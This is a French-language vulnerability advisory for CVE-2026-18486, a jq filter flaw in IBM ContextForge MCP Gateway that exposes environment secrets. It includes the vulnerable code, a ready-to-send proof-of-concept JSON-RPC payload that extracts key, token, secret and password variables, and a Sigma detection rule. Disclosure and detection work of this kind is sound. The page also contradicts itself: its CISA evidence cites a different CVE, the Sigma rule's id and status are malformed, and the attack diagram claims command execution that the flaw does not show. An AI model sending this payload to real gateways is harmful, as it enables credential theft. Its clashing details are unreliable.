CVE-2026-18486 : vol d'identifiants via les filtres jq dans IBM ContextForge MCP Gateway
HERMES
SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE
Cible :IBM ContextForge MCP Gateway (contextforge.engine.jq_filter (Filter Evaluation Engine)) Confiance : 98%
88 / 100
Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 17 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
Divergence & Justification opérationnelle
Le score CVSS v3.1 s'élève à 8.5 (Élevé) et le score Hermes Threat Score est calculé à 88 (ÉLEVÉ). ContextForge centralisant les accès agents pour des environnements d'entreprise, la fuite des variables d'environnement expose des secrets transverses.
🕸️ Graphe de connaissances connecté & Provenance
CVE-2026-18486: IBM ContextForge MCP Gateway jq Filter Credential TheftVULNÉRABILITÉ
Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTIBM ContextForge MCP Gateway
98% VERY_HIGH
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in IBM ContextForge MCP Gateway documented in Hermes dossier.”
Preuves vérifiées associées :
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice d’impact
Section intitulée « 1. Contexte technique & matrice d’impact »| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-18486 | Menaces IA Agentique & Protocole MCP |
| Produit ciblé | IBM ContextForge MCP Gateway | IBM Corporation |
| Composant affecté | contextforge.engine.jq_filter (Filter Evaluation Engine) | Orchestrateur et couche d’outils agentiques |
| Nature de la faille | CWE-200: Exposure of Sensitive Information / CWE-88: Argument Injection | Violation d’intégrité et d’exécution |
| Versions vulnérables | all versions prior to 1.4.2 | Environnements en production |
| Correctif disponible | 1.4.2 | Mise à jour impérative |
2. Analyse technique approfondie
Section intitulée « 2. Analyse technique approfondie »Analyse technique de la fuite mémoire
Section intitulée « Analyse technique de la fuite mémoire »La passerelle compilait les filtres jq sans restreindre les accès aux ressources de l’interpréteur :
# Compilation directe dans contextforge/engine/jq_filter.pydef transform_output(raw_json, filter_expr): program = jq.compile(filter_expr) return program.input(text=raw_json).all()La fonction native env de jq permet d’accéder directement au pointeur char **environ. Un filtre demandant env renvoie l’intégralité des identifiants et clés de chiffrement de la passerelle.
+----------------------------------------------------------------------------------------------------+| CYCLE D'ATTAQUE CVE-2026-18486 |+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt] │ │ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur ▼ [IBM ContextForge MCP Gateway] │ ├───► 1. Ingestion par contextforge.engine.jq_filter (Filter Evaluation Engine) │ - Échec de validation, absence de filtrage ou contournement de sandbox │ ├───► 2. Exécution / Mutation d'état │ - Exécution de commandes OS ou exfiltration d'identifiants │ ▼ [Infrastructure Cible Compromise] │ └───► Vol de données, prise de contrôle du serveur ou persistance+----------------------------------------------------------------------------------------------------+3. Preuve de concept (PoC) & analyse du payload
Section intitulée « 3. Preuve de concept (PoC) & analyse du payload »{ "jsonrpc": "2.0", "id": 99, "method": "contextforge/transform", "params": { "input": { "status": "ok" }, "filter": "env | to_entries | map(select(.key | test("KEY|TOKEN|SECRET|PASS")))" }}4. Ingénierie de détection & télémétrie
Section intitulée « 4. Ingénierie de détection & télémétrie »Règle de détection Sigma
Section intitulée « Règle de détection Sigma »title: ContextForge MCP Gateway Secret Leakage Filterid: 18486c01-e486-4a1b-8f22-contextforge01status: highdescription: Detects jq transformation queries in ContextForge containing the env keyword or secret patterns.author: Hermes Codex Detection Engineeringdate: 2026-09-07logsource: product: ibm_contextforge service: gateway_auditdetection: selection: filter_expression|contains: - 'env |' - 'env.' - '$ENV' condition: selectionlevel: high5. Guide de remédiation & plan d’action
Section intitulée « 5. Guide de remédiation & plan d’action »- Appliquer les correctifs : mettre à jour
IBM ContextForge MCP Gatewayvers la version1.4.2sans délai. - Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
- Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
- Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.